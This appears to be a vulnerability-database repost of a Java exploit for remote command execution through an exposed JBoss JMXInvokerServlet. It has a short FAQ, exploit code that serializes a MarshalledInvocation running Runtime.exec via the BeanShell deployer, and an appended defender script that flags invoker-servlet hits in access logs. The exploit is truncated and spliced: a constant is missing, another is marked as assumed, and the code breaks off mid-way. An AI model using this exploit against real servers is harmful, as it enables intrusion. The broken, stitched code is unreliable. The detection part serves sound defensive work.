JBoss JMXInvokerServlet JMXInvoker 0.3 remote command execution vulnerability

ID MYHACK58:62201560632
Type myhack58
Reporter Anonymous
Modified 2015-04-01T00:00:00


/*
 * JBoss JMXInvokerServlet Remote Command Execution
 * JMXInvoker.java v0.3 - Luca Carettoni @_ikki
 *
 * This code exploits a common misconfiguration in the JBoss Application Server (4.x, 5.x, ...).
 * Whenever the JMX Invoker is exposed with the default configuration, a malicious "MarshalledInvocation"
 * serialized Java object allows to execute arbitrary code. This exploit works even if the "Web-Console"
 * and the "JMX Console" are protected or disabled.
 *
 * [FAQ]
 *
 * Q: Is my target vulnerable?
 * A: If http://[target]:8080/invoker/JMXInvokerServlet exists, it's likely exploitable
 *
 * Q: How to fix it?
 * A: Enable authentication in "jmx-invoker-service.xml"
 *
 * Q: Is this exploit version-dependent?
 * A: Unfortunately, yes. A hash value is used to properly invoke a method.
 *    At least comparing version 4.x and 5.x, these hashes are different.
 *
 * Q: How to compile and launch it?
 * A: javac -cp ./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker.java
 *    java -cp .:./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker
 *    Yes, it's a Java exploit. I can already see some of you complaining....
 */

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.ObjectOutputStream;
import java.lang.reflect.Array;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.net.ConnectException;
import java.net.HttpURLConnection;
import java.net.URL;
import javax.management.MalformedObjectNameException;
import javax.management.ObjectName;
import org.jboss.invocation.MarshalledInvocation; // within jboss.jar (look into the original JBoss installation dir)

public class JMXInvokerServlet {

    //---------> CHANGE ME
    // The page truncates this block: the declaration of the version-specific
    // `hash` constant used below is missing, and only the URL literal survives.
    // The constant name `url` is assumed here; the value is the page's placeholder.
    static final String url = "http://www.myhack58.com/invoker/JMXInvokerServlet";
    static final String cmd = "touch /tmp/exectest";
    //-------------------------------

    public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, MalformedObjectNameException {

        System.out.println("\n--[ JBoss JMXInvokerServlet Remote Command Execution ]");

        // Create a malicious Java serialized object
        MarshalledInvocation payload = new MarshalledInvocation();
        payload.setObjectName(new Integer(hash));

        // Executes the MBean invoke operation
        Class c = Class.forName("javax.management.MBeanServerConnection");
        Method method = c.getDeclaredMethod("invoke",
                javax.management.ObjectName.class,
                java.lang.String.class,
                java.lang.Object[].class,
                java.lang.String[].class);
        payload.setMethod(method);

        // Define the MBean's name, operation and pars
        Object myObj[] = new Object[4];
        // MBean object name
        myObj[0] = new ObjectName("jboss.deployer:service=BSHDeployer");
        // Operation name
        myObj[1] = new String("createScriptDeployment");
        // Actual parameters
        myObj[2] = new String[]{"Runtime.getRuntime().exec(\"" + cmd + "\");", "Script Name"};
        // Operation signature
        myObj[3] = new String[]{"java.lang.String", "java.lang.String"};

        payload.setArguments(myObj);
        System.out.println("\n--[*] MarshalledInvocation object created");
        // For debugging - visualize the raw object
        // System.out.println(dump(payload));

//Serialize the object

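A defender-side check, added here and not part of the original exploit or its author's code: it triages web access-log lines for hits on the /invoker/JMXInvokerServlet path that the FAQ names as the exposure indicator, and recognises the Java serialization stream header that a serialized MarshalledInvocation request body starts with. The combined log format, the constructed sample lines and the severity labels are my assumptions.

```python
import re
from typing import Iterable

# Path the advisory's FAQ names as the exposure indicator.
INVOKER_PATH = "/invoker/JMXInvokerServlet"
# Java serialization stream header: STREAM_MAGIC 0xACED, STREAM_VERSION 5.
JAVA_SERIAL_MAGIC = b"\xac\xed\x00\x05"

# Combined log format (assumed), as written by httpd or the JBoss access-log valve.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


def is_java_serialized(body: bytes) -> bool:
    """True if a captured request body starts with the Java serialization magic."""
    return body.startswith(JAVA_SERIAL_MAGIC)


def triage_access_log(lines: Iterable[str]) -> list:
    """Flag every request to the JMX invoker servlet. A POST answered with 200 is
    the shape of a completed MarshalledInvocation round trip and is rated 'high';
    any other hit (probing for the endpoint) is rated 'medium'."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not m.group("path").startswith(INVOKER_PATH):
            continue
        post_ok = m.group("method") == "POST" and m.group("status") == "200"
        findings.append({
            "src": m.group("ip"),
            "method": m.group("method"),
            "status": int(m.group("status")),
            "severity": "high" if post_ok else "medium",
        })
    return findings


# Constructed sample lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Apr/2015:10:00:01 +0000] "GET /jmx-console/ HTTP/1.1" 401 0',
    '10.0.0.9 - - [01/Apr/2015:10:00:02 +0000] "GET /invoker/JMXInvokerServlet HTTP/1.1" 200 1234',
    '10.0.0.9 - - [01/Apr/2015:10:00:03 +0000] "POST /invoker/JMXInvokerServlet HTTP/1.1" 200 100',
    '10.0.0.7 - - [01/Apr/2015:10:00:04 +0000] "GET /index.html HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for finding in triage_access_log(SAMPLE_LOG):
        print(finding)
```

A GET that returns 200 on this path confirms the servlet is reachable, which is exactly the FAQ's "likely exploitable" condition, so even the medium-severity hits are worth checking against the authentication setting in jmx-invoker-service.xml.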